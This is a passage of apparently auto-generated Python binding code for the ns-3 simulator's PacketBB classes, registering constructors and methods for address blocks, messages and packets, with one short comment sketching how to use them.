## packetbb.h (module 'network'): uint8_t ns3::PbbAddressBlock::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'uint8_t',
[],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrintAddress(std::ostream & os, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('PrintAddress',
'void',
[param('std::ostream &', 'os'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::SerializeAddress(uint8_t * buffer, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('SerializeAddress',
'void',
[param('uint8_t *', 'buffer'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbAddressBlockIpv4_methods(root_module, cls):
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv4::PbbAddressBlockIpv4(ns3::PbbAddressBlockIpv4 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbAddressBlockIpv4 const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv4::PbbAddressBlockIpv4() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Address ns3::PbbAddressBlockIpv4::DeserializeAddress(uint8_t * buffer) const [member function]
cls.add_method('DeserializeAddress',
'ns3::Address',
[param('uint8_t *', 'buffer')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressBlockIpv4::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'uint8_t',
[],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlockIpv4::PrintAddress(std::ostream & os, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('PrintAddress',
'void',
[param('std::ostream &', 'os'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlockIpv4::SerializeAddress(uint8_t * buffer, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('SerializeAddress',
'void',
[param('uint8_t *', 'buffer'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbAddressBlockIpv6_methods(root_module, cls):
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv6::PbbAddressBlockIpv6(ns3::PbbAddressBlockIpv6 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbAddressBlockIpv6 const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv6::PbbAddressBlockIpv6() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Address ns3::PbbAddressBlockIpv6::DeserializeAddress(uint8_t * buffer) const [member function]
cls.add_method('DeserializeAddress',
'ns3::Address',
[param('uint8_t *', 'buffer')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressBlockIpv6::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'uint8_t',
[],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlockIpv6::PrintAddress(std::ostream & os, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('PrintAddress',
'void',
[param('std::ostream &', 'os'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlockIpv6::SerializeAddress(uint8_t * buffer, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('SerializeAddress',
'void',
[param('uint8_t *', 'buffer'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbMessage_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbMessage::PbbMessage(ns3::PbbMessage const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbMessage const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbMessage::PbbMessage() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> ns3::PbbMessage::AddressBlockBack() [member function]
cls.add_method('AddressBlockBack',
'ns3::Ptr< ns3::PbbAddressBlock >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> const ns3::PbbMessage::AddressBlockBack() const [member function]
cls.add_method('AddressBlockBack',
'ns3::Ptr< ns3::PbbAddressBlock > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockBegin() [member function]
cls.add_method('AddressBlockBegin',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockBegin() const [member function]
cls.add_method('AddressBlockBegin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::AddressBlockClear() [member function]
cls.add_method('AddressBlockClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbMessage::AddressBlockEmpty() const [member function]
cls.add_method('AddressBlockEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockEnd() [member function]
cls.add_method('AddressBlockEnd',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockEnd() const [member function]
cls.add_method('AddressBlockEnd',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockErase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > position) [member function]
cls.add_method('AddressBlockErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > ns3::PbbMessage::AddressBlockErase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > first, std::_List_iterator<ns3::Ptr<ns3::PbbAddressBlock> > last) [member function]
cls.add_method('AddressBlockErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressBlock > >', 'last')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> ns3::PbbMessage::AddressBlockFront() [member function]
cls.add_method('AddressBlockFront',
'ns3::Ptr< ns3::PbbAddressBlock >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> const ns3::PbbMessage::AddressBlockFront() const [member function]
cls.add_method('AddressBlockFront',
'ns3::Ptr< ns3::PbbAddressBlock > const',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::AddressBlockPopBack() [member function]
cls.add_method('AddressBlockPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbMessage::AddressBlockPopFront() [member function]
cls.add_method('AddressBlockPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbMessage::AddressBlockPushBack(ns3::Ptr<ns3::PbbAddressBlock> block) [member function]
cls.add_method('AddressBlockPushBack',
'void',
[param('ns3::Ptr< ns3::PbbAddressBlock >', 'block')])
## packetbb.h (module 'network'): void ns3::PbbMessage::AddressBlockPushFront(ns3::Ptr<ns3::PbbAddressBlock> block) [member function]
cls.add_method('AddressBlockPushFront',
'void',
[param('ns3::Ptr< ns3::PbbAddressBlock >', 'block')])
## packetbb.h (module 'network'): int ns3::PbbMessage::AddressBlockSize() const [member function]
cls.add_method('AddressBlockSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::Deserialize(ns3::Buffer::Iterator & start) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')])
## packetbb.h (module 'network'): static ns3::Ptr<ns3::PbbMessage> ns3::PbbMessage::DeserializeMessage(ns3::Buffer::Iterator & start) [member function]
cls.add_method('DeserializeMessage',
'ns3::Ptr< ns3::PbbMessage >',
[param('ns3::Buffer::Iterator &', 'start')],
is_static=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbMessage::GetHopCount() const [member function]
cls.add_method('GetHopCount',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbMessage::GetHopLimit() const [member function]
cls.add_method('GetHopLimit',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Address ns3::PbbMessage::GetOriginatorAddress() const [member function]
cls.add_method('GetOriginatorAddress',
'ns3::Address',
[],
is_const=True)
## packetbb.h (module 'network'): uint16_t ns3::PbbMessage::GetSequenceNumber() const [member function]
cls.add_method('GetSequenceNumber',
'uint16_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint32_t ns3::PbbMessage::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbMessage::GetType() const [member function]
cls.add_method('GetType',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbMessage::HasHopCount() const [member function]
cls.add_method('HasHopCount',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbMessage::HasHopLimit() const [member function]
cls.add_method('HasHopLimit',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbMessage::HasOriginatorAddress() const [member function]
cls.add_method('HasOriginatorAddress',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbMessage::HasSequenceNumber() const [member function]
cls.add_method('HasSequenceNumber',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::Print(std::ostream & os, int level) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os'), param('int', 'level')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::Serialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::SetHopCount(uint8_t hopcount) [member function]
cls.add_method('SetHopCount',
'void',
[param('uint8_t', 'hopcount')])
## packetbb.h (module 'network'): void ns3::PbbMessage::SetHopLimit(uint8_t hoplimit) [member function]
cls.add_method('SetHopLimit',
'void',
[param('uint8_t', 'hoplimit')])
## packetbb.h (module 'network'): void ns3::PbbMessage::SetOriginatorAddress(ns3::Address address) [member function]
cls.add_method('SetOriginatorAddress',
'void',
[param('ns3::Address', 'address')])
## packetbb.h (module 'network'): void ns3::PbbMessage::SetSequenceNumber(uint16_t seqnum) [member function]
cls.add_method('SetSequenceNumber',
'void',
[param('uint16_t', 'seqnum')])
## packetbb.h (module 'network'): void ns3::PbbMessage::SetType(uint8_t type) [member function]
cls.add_method('SetType',
'void',
[param('uint8_t', 'type')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbMessage::TlvBack() [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> const ns3::PbbMessage::TlvBack() const [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvBegin() [member function]
cls.add_method('TlvBegin',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvBegin() const [member function]
cls.add_method('TlvBegin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::TlvClear() [member function]
cls.add_method('TlvClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbMessage::TlvEmpty() const [member function]
cls.add_method('TlvEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvEnd() [member function]
cls.add_method('TlvEnd',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvEnd() const [member function]
cls.add_method('TlvEnd',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvErase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > position) [member function]
cls.add_method('TlvErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbMessage::TlvErase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > first, std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > last) [member function]
cls.add_method('TlvErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'last')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbMessage::TlvFront() [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> const ns3::PbbMessage::TlvFront() const [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::TlvPopBack() [member function]
cls.add_method('TlvPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbMessage::TlvPopFront() [member function]
cls.add_method('TlvPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbMessage::TlvPushBack(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('TlvPushBack',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbMessage::TlvPushFront(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('TlvPushFront',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): int ns3::PbbMessage::TlvSize() const [member function]
cls.add_method('TlvSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> ns3::PbbMessage::AddressBlockDeserialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('AddressBlockDeserialize',
'ns3::Ptr< ns3::PbbAddressBlock >',
[param('ns3::Buffer::Iterator &', 'start')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::Address ns3::PbbMessage::DeserializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('DeserializeOriginatorAddress',
'ns3::Address',
[param('ns3::Buffer::Iterator &', 'start')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::PbbAddressLength ns3::PbbMessage::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'ns3::PbbAddressLength',
[],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::PrintOriginatorAddress(std::ostream & os) const [member function]
cls.add_method('PrintOriginatorAddress',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessage::SerializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('SerializeOriginatorAddress',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbMessageIpv4_methods(root_module, cls):
## packetbb.h (module 'network'): ns3::PbbMessageIpv4::PbbMessageIpv4(ns3::PbbMessageIpv4 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbMessageIpv4 const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbMessageIpv4::PbbMessageIpv4() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> ns3::PbbMessageIpv4::AddressBlockDeserialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('AddressBlockDeserialize',
'ns3::Ptr< ns3::PbbAddressBlock >',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::Address ns3::PbbMessageIpv4::DeserializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('DeserializeOriginatorAddress',
'ns3::Address',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::PbbAddressLength ns3::PbbMessageIpv4::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'ns3::PbbAddressLength',
[],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessageIpv4::PrintOriginatorAddress(std::ostream & os) const [member function]
cls.add_method('PrintOriginatorAddress',
'void',
[param('std::ostream &', 'os')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessageIpv4::SerializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('SerializeOriginatorAddress',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbMessageIpv6_methods(root_module, cls):
## packetbb.h (module 'network'): ns3::PbbMessageIpv6::PbbMessageIpv6(ns3::PbbMessageIpv6 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbMessageIpv6 const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbMessageIpv6::PbbMessageIpv6() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressBlock> ns3::PbbMessageIpv6::AddressBlockDeserialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('AddressBlockDeserialize',
'ns3::Ptr< ns3::PbbAddressBlock >',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::Address ns3::PbbMessageIpv6::DeserializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('DeserializeOriginatorAddress',
'ns3::Address',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): ns3::PbbAddressLength ns3::PbbMessageIpv6::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'ns3::PbbAddressLength',
[],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessageIpv6::PrintOriginatorAddress(std::ostream & os) const [member function]
cls.add_method('PrintOriginatorAddress',
'void',
[param('std::ostream &', 'os')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbMessageIpv6::SerializeOriginatorAddress(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('SerializeOriginatorAddress',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True, visibility='protected', is_virtual=True)
return
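# Illustrative note (editorial, not generator output): the PacketBB (RFC 5444) classes
# registered in this file can be combined from Python roughly as sketched below,
# assuming the generated extension is importable as ns.network (an assumption of this
# note); only methods registered in this file are used:
#   import ns.network
#   msg = ns.network.PbbMessageIpv4()   # concrete PbbMessage for IPv4 addresses
#   msg.SetType(1)
#   msg.SetSequenceNumber(10)
#   pkt = ns.network.PbbPacket()
#   pkt.MessagePushBack(msg)            # packet takes a Ptr<PbbMessage>
#   size = pkt.GetSerializedSize()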
def register_Ns3PbbPacket_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbPacket::PbbPacket(ns3::PbbPacket const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbPacket const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbPacket::PbbPacket() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): uint32_t ns3::PbbPacket::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > position) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > first, std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > last) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'last')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > position) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > first, std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > last) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >', 'last')])
## packetbb.h (module 'network'): ns3::TypeId ns3::PbbPacket::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## packetbb.h (module 'network'): uint16_t ns3::PbbPacket::GetSequenceNumber() const [member function]
cls.add_method('GetSequenceNumber',
'uint16_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint32_t ns3::PbbPacket::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## packetbb.h (module 'network'): static ns3::TypeId ns3::PbbPacket::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbPacket::GetVersion() const [member function]
cls.add_method('GetVersion',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbPacket::HasSequenceNumber() const [member function]
cls.add_method('HasSequenceNumber',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbMessage> ns3::PbbPacket::MessageBack() [member function]
cls.add_method('MessageBack',
'ns3::Ptr< ns3::PbbMessage >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbMessage> const ns3::PbbPacket::MessageBack() const [member function]
cls.add_method('MessageBack',
'ns3::Ptr< ns3::PbbMessage > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::MessageBegin() [member function]
cls.add_method('MessageBegin',
'std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::MessageBegin() const [member function]
cls.add_method('MessageBegin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbMessage > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::MessageClear() [member function]
cls.add_method('MessageClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbPacket::MessageEmpty() const [member function]
cls.add_method('MessageEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::MessageEnd() [member function]
cls.add_method('MessageEnd',
'std::_List_iterator< ns3::Ptr< ns3::PbbMessage > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbMessage> > ns3::PbbPacket::MessageEnd() const [member function]
cls.add_method('MessageEnd',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbMessage > >',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbMessage> ns3::PbbPacket::MessageFront() [member function]
cls.add_method('MessageFront',
'ns3::Ptr< ns3::PbbMessage >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbMessage> const ns3::PbbPacket::MessageFront() const [member function]
cls.add_method('MessageFront',
'ns3::Ptr< ns3::PbbMessage > const',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::MessagePopBack() [member function]
cls.add_method('MessagePopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbPacket::MessagePopFront() [member function]
cls.add_method('MessagePopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbPacket::MessagePushBack(ns3::Ptr<ns3::PbbMessage> message) [member function]
cls.add_method('MessagePushBack',
'void',
[param('ns3::Ptr< ns3::PbbMessage >', 'message')])
## packetbb.h (module 'network'): void ns3::PbbPacket::MessagePushFront(ns3::Ptr<ns3::PbbMessage> message) [member function]
cls.add_method('MessagePushFront',
'void',
[param('ns3::Ptr< ns3::PbbMessage >', 'message')])
## packetbb.h (module 'network'): int ns3::PbbPacket::MessageSize() const [member function]
cls.add_method('MessageSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::SetSequenceNumber(uint16_t number) [member function]
cls.add_method('SetSequenceNumber',
'void',
[param('uint16_t', 'number')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbPacket::TlvBack() [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> const ns3::PbbPacket::TlvBack() const [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::TlvBegin() [member function]
cls.add_method('TlvBegin',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::TlvBegin() const [member function]
cls.add_method('TlvBegin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::TlvClear() [member function]
cls.add_method('TlvClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbPacket::TlvEmpty() const [member function]
cls.add_method('TlvEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::TlvEnd() [member function]
cls.add_method('TlvEnd',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbPacket::TlvEnd() const [member function]
cls.add_method('TlvEnd',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbPacket::TlvFront() [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> const ns3::PbbPacket::TlvFront() const [member function]
cls.add_method('TlvFront',
